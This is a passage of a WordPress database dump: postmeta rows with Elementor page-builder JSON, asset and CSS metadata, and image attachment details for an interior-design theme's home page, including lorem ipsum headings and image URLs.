flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3414,4794,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3415,4794,'_elementor_pro_version','3.8.1'),(3416,4794,'_elementor_css','a:6:{s:4:\"time\";i:1685014033;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3424,4796,'_wp_attached_file','2023/05/IMG-5878-scaled.jpg'),(3425,4796,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1920;s:4:\"file\";s:27:\"2023/05/IMG-5878-scaled.jpg\";s:8:\"filesize\";i:674004;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"IMG-5878-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28248;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"IMG-5878-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135061;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG-5878-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19057;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"IMG-5878-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86428;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:22:\"IMG-5878-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:267220;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:22:\"IMG-5878-2048x1536.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:446761;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG-5878-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94460;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG-5878-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45661;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:20:\"IMG-5878-378x824.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64232;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:20:\"IMG-5878-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91620;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 11\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1675338448\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.25\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:12:\"IMG-5878.jpg\";}'),(3426,4797,'_wp_page_template','elementor_header_footer'),(3427,4797,'_elementor_edit_mode','builder'),(3428,4797,'_elementor_template_type','wp-page'),(3429,4797,'_elementor_version','3.8.1'),(3430,4797,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM 